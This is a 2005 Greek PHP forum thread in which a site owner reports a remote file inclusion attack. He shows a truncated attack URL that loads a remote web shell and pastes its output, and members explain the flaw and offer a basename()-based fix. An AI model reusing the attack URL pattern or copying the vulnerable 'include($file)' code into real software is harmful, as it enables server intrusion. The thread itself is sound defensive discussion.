Προσπαθεια hack στην σελίδα μου

Σε αυτή την περιοχή μπορείτε να βρείτε ή να αναζητήσετε πληροφορίες σχετικές με την PHP

Συντονιστές: WebDev Moderators, Super-Moderators, PHP Moderators

Απάντηση
Άβαταρ μέλους
lampadarios
Δημοσιεύσεις: 121
Εγγραφή: 02 Απρ 2003 01:32

Προσπαθεια hack στην σελίδα μου

Δημοσίευση από lampadarios » 21 Ιαν 2005 00:19

Εδω και λίγο καίρο, κάποιες μέρες βλέπω ότι κάποιος προσπαθεί με κάποιον κώδικα να κάνει hack την σελίδα είτε βρίσκοντας τον κωδικό, είτε δεν ξέρω με ποιον άλλο σκοπό.
μπαίνει στην σελίδα με αυτή την διεύθυνση
http://selidamou.gr/index.php?page=http ... cmd?&cmd=w
μπορείτε να δείτε τον κώδικα που εχει το αρχείο που χρησιμοποιεί στο
http://paginas.terra.com.br/lazer/piran ... cmd?&cmd=w

Το αποτέλεσμα είναι

NMAP PHP COMMAND V2.0

Feito por rowdy

Informacao do Sistema

sysname: Linux
nodename: atl1.oservermou.com
release: 2.4.20-28.9smp
version: #1 SMP Thu Dec 18 13:37:36 EST 2003
machine: i686
Nome do usuario atual: tousernamemou
Versao do PHP: 4.3.10
ID do usuario: uid(99) euid(99) gid(99)
Pasta atual: /home/tousernamemou/public_html
Ip do servidor: 209.124.83.122
Servidor Web: Apache/1.3.33 (Unix) mod_gzip/1.3.26.1a mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.10 FrontPage/5.0.2.2634a mod_ssl/2.8.22 OpenSSL/0.9.7a

[*] Executar comando
Resultado do comando abaixo


<br />
<b>Warning</b>: passthru() has been disabled for security reasons in <b>http://paginas.terra.com.br/lazer/piran ... dex.php</b> on line <b>69</b><br />



Agora deixa msg para mais um dos milhoes de lolz admins d:)


E acessem meu canal na BrasNET o #NMAP e manda beijinho pra mim haha.


Greetz: #IRCaliente at BrasNet & #Brazil at Efnet 31337 h4x0r.



Μπορείτε να βοηθήσετε κάπως?

Άβαταρ μέλους
cdhyper
Literature Moderator
Δημοσιεύσεις: 9707
Εγγραφή: 23 Ιουν 2001 03:00
Τοποθεσία: Φωτονερόπετρα
Επικοινωνία:

Προσπαθεια hack στην σελίδα μου

Δημοσίευση από cdhyper » 21 Ιαν 2005 00:30

:question:

Μπορούμε να δούμε τον κώδικα που χρησιμοποιεί αυτός που θέλει να σου κάνει hack και αυτός ο κώδικας έχει και αποτέλεσμα;

Τι μας λες ωρε; Εγώ ήπια κάτι και με πείραξε ή χρειάζεται να τακτοποιήσεις λίγο τα λεγόμενά σου;

Προφανώς κάποιο search engine bot μπαίνει στη σελίδα σου από ισπανία από,τι φαίνεται για λόγους καταχώρησης του περιεχομένου σου.
Σύγκριση τιμών Supermarket: http://www.shopnsave.gr
Νέα Ιταλικα επιπλα κουζινας
Για φιλοσόφους: http://filosofia.gr και http://liantinis.org

Άβαταρ μέλους
lampadarios
Δημοσιεύσεις: 121
Εγγραφή: 02 Απρ 2003 01:32

Προσπαθεια hack στην σελίδα μου

Δημοσίευση από lampadarios » 21 Ιαν 2005 00:39

Δεν εχω δει καποιο search engine bot να χρησιμοποιεί την εντολή passthru()
Δες το αρχειο και θα καταλάβεις ότι δεν είναι κάτι τέτοιο.

Ryu
Δημοσιεύσεις: 74
Εγγραφή: 24 Σεπ 2004 16:32

Προσπαθεια hack στην σελίδα μου

Δημοσίευση από Ryu » 21 Ιαν 2005 00:42

Μάλλον εσύ έχεις πιει γιατί εγώ δεν κατάλαβα το ερωτηματικό που κολλάει... Για εξήγα καλύτερα... :question: :hammer:

Μπορούμε να δούμε τον κώδικα που χρησιμοποιεί αυτός που θέλει να σου κάνει hack και αυτός ο κώδικας έχει και αποτέλεσμα;

Άβαταρ μέλους
Rapid-eraser
WebDev Moderator
Δημοσιεύσεις: 6851
Εγγραφή: 05 Απρ 2003 17:50
Τοποθεσία: Πειραιάς
Επικοινωνία:

Προσπαθεια hack στην σελίδα μου

Δημοσίευση από Rapid-eraser » 21 Ιαν 2005 00:43

eixes mia apo tis pio klasikes epi8eseis ...
meso tis texvikis file inclution .
Afto pou ekave o paixtis ntav apla va kataferei va treksei kodika mesa apo to site sou pou esy dev eixes sxediasei va trexei.
Eivai poli tipiko afto.
Profavos xrisimopiise kapoia adivamia kapoiou etoimou script pou xrisimopiises giati sivi8os otav grafoume dikomas kodika (apo tixi tou protari sivi8os :P) katafervoume kai kavoume tnv zoi tous pio diskoli.

av pali eivai dikos sou o kodikas kai exeis kavei kati tetoio
<?
include($file);
?>

kai exeis link tou style kati.php?file=file.php

tote kala va pa8eis :P to manual to grafei ksastera prosoxi sta file inclutions
xrisimopiise kapoio preapended path kai fixaristi
epektasi
px "/path/tofile/$file.php"

opos episis kai kapoia function pou va ka8arizei to string apo ta mi epi8imita pragmata opos tnv basename()

Prosoxi otav pervoume dedomeva apo eksoterikes piges pavtote ta filtraroume kai dev ta dexomaste asizititi.
Τελευταία επεξεργασία από το μέλος Rapid-eraser την 21 Ιαν 2005 00:46, έχει επεξεργασθεί 1 φορά συνολικά.
Cu, Rapid-eraser, Tα αγαθά copies κτώνται.
Love is like oxygen, You get too much you get too high
Not enough and you're gonna die, Love gets you high

Ryu
Δημοσιεύσεις: 74
Εγγραφή: 24 Σεπ 2004 16:32

Προσπαθεια hack στην σελίδα μου

Δημοσίευση από Ryu » 21 Ιαν 2005 00:46

meso tis texvikis file inclution.
Inclution?? Include εννοείς;

Άβαταρ μέλους
Rapid-eraser
WebDev Moderator
Δημοσιεύσεις: 6851
Εγγραφή: 05 Απρ 2003 17:50
Τοποθεσία: Πειραιάς
Επικοινωνία:

Προσπαθεια hack στην σελίδα μου

Δημοσίευση από Rapid-eraser » 21 Ιαν 2005 00:47

inclusion i8ela va grapsw alla eimai ligo avor8ografos kai sta agglika mou :P
Cu, Rapid-eraser, Tα αγαθά copies κτώνται.
Love is like oxygen, You get too much you get too high
Not enough and you're gonna die, Love gets you high

Ryu
Δημοσιεύσεις: 74
Εγγραφή: 24 Σεπ 2004 16:32

Προσπαθεια hack στην σελίδα μου

Δημοσίευση από Ryu » 21 Ιαν 2005 00:53

Ευχαριστώ. Δεν ξέρω php και λέω θα χει γούστο να εννοεί κάτι άλλο... Δεν το βρήκα και στο altavista σαν λέξη, και έτσι ρώτησα... Τώρα που (χάρη στην άγνοια μου) στο επισήμανα, προσπάθησε να το θυμάσαι μην σου κολλήσει λάθος (με φαντάζεσαι μετά από χρόνια να έχω μάθει php και να με μπερδεύει μια ανορθογραφία; Θα σε κυνηγάω με το τουφέκι!! :kaloe: )

Άβαταρ μέλους
Rapid-eraser
WebDev Moderator
Δημοσιεύσεις: 6851
Εγγραφή: 05 Απρ 2003 17:50
Τοποθεσία: Πειραιάς
Επικοινωνία:

Προσπαθεια hack στην σελίδα μου

Δημοσίευση από Rapid-eraser » 21 Ιαν 2005 01:30

include rima
inclusion ousiastiko
vomizo exei megali diafora :P
to eva eivai function tis php (opote eivai apoliti n or8ografia)
kai to allo ovoma texvikis :P file inclusion

dev vomizo va eivai kai toso tragika ta pragmata :)
Cu, Rapid-eraser, Tα αγαθά copies κτώνται.
Love is like oxygen, You get too much you get too high
Not enough and you're gonna die, Love gets you high

Άβαταρ μέλους
lampadarios
Δημοσιεύσεις: 121
Εγγραφή: 02 Απρ 2003 01:32

Προσπαθεια hack στην σελίδα μου

Δημοσίευση από lampadarios » 21 Ιαν 2005 02:15

Ο κώδικας είναι δικός μου και με τη βοήθεια του manual τον εγραψα, αλλά δεν είδα κάτι για file inclutions . Ή μπορεί να μην έδωσα σημασία.

Λοιπόν Rapid-eraser ο κώδικάς μου είναι ακριβώς όπως λες.

link:
index.php?file=file.php

και

<?
include($file);
?>

Αν κάνω κάτι τέτοιο όπως παρακάτω θα δουλεψει λες ή χρησιμοποιούν και άλλους τρόπους?


if((substr($rrpage, 0, 4))=="http")
{
include "hack.html";
}else{
include ($file);}

Άβαταρ μέλους
Rapid-eraser
WebDev Moderator
Δημοσιεύσεις: 6851
Εγγραφή: 05 Απρ 2003 17:50
Τοποθεσία: Πειραιάς
Επικοινωνία:

Προσπαθεια hack στην σελίδα μου

Δημοσίευση από Rapid-eraser » 21 Ιαν 2005 02:28

oxi kave kati pio praktiko
av kai dev eivai n taktiki mou va divo kodika me epiases stis kales mou simera

Κώδικας: Επιλογή όλων

<?

$file = basename&#40;$_GET&#91;"file"&#93;&#41;;
$path = "path/to/file/$file.php";

if&#40;file_exists&#40;$path&#41;&#41;&#123;
include&#40;$path&#41;;
&#125;else&#123;
include&#40;"arxikiselida.php"&#41;;
&#125;

?>

twra kalovtas to arxeio.php?file=about

tote 8a paei afto kai 8a kalesei aftomata to arxeio pou briskete sto
path/to/file/about.php
kai 8a to kavei include.

Aftos eivai ligo asfalesteros tropos pou mporeis va to grapseis afto
giati etsi apoklieisa ta remote arxeia kai etsi mporeis kata tropo
va controlareis to ti 8a givei

safos bebea mporei va graftei kai poli pio siv8eta avaloga me tis avagkes sou .
Cu, Rapid-eraser, Tα αγαθά copies κτώνται.
Love is like oxygen, You get too much you get too high
Not enough and you're gonna die, Love gets you high

Άβαταρ μέλους
lampadarios
Δημοσιεύσεις: 121
Εγγραφή: 02 Απρ 2003 01:32

Προσπαθεια hack στην σελίδα μου

Δημοσίευση από lampadarios » 21 Ιαν 2005 02:35

Σε ευχαριστώ πολύ.
Αυτο νομίζω ότι αρκεί.
Αν βρουν αλλους τρόπους οι μάγκες θα σε ξαναχρειαστώ.

Πάντως πολλές έχω αναρωτηθεί που τα ξέρετε οι freestuff-τσίδες , όλα αυτά που ξέρετε.
Είναι πάρα πολλά που έχω βρει μέσα από το freestuff τα οποία έπειτα από πολύ αναζήτηση δεν είχα βρει...

Άβαταρ μέλους
versus-7
Δημοσιεύσεις: 227
Εγγραφή: 01 Μαρ 2004 03:23
Τοποθεσία: Bremen
Επικοινωνία:

Προσπαθεια hack στην σελίδα μου

Δημοσίευση από versus-7 » 21 Ιαν 2005 03:37

I love freestuff :lol:

Άβαταρ μέλους
Rapid-eraser
WebDev Moderator
Δημοσιεύσεις: 6851
Εγγραφή: 05 Απρ 2003 17:50
Τοποθεσία: Πειραιάς
Επικοινωνία:

Προσπαθεια hack στην σελίδα μου

Δημοσίευση από Rapid-eraser » 21 Ιαν 2005 07:56

O ka8evas stov tomea tou :P dev givete va ta ksereis ola.
Apla tixevei kapoioi va exouve asxoli8ei ligo parapavo me kati.
Dev eivai kalo pou o evas simplirovei ta keva tou allou ? (se logika plesia pavta)
Egw pistebw pos aftos eivia o aftoskopos kai o logos iparksis tou freestuff.
Cu, Rapid-eraser, Tα αγαθά copies κτώνται.
Love is like oxygen, You get too much you get too high
Not enough and you're gonna die, Love gets you high

Άβαταρ μέλους
ledraweb
Honorary Member
Δημοσιεύσεις: 1356
Εγγραφή: 13 Νοέμ 2004 11:00
Τοποθεσία: Λευκωσία

Προσπαθεια hack στην σελίδα μου

Δημοσίευση από ledraweb » 21 Ιαν 2005 21:54

Rapid-eraser έγραψε:inclusion i8ela va grapsw alla eimai ligo avor8ografos kai sta agglika mou :P
Αγγλικα :question: :question: :roll:
None Of Us Is As Smart As All Of Us!!!

Εικόνα

Απάντηση

Επιστροφή στο “PHP Προγραμματισμός”

Μέλη σε σύνδεση

Μέλη σε αυτήν τη Δ. Συζήτηση: Δεν υπάρχουν εγγεγραμμένα μέλη και 0 επισκέπτες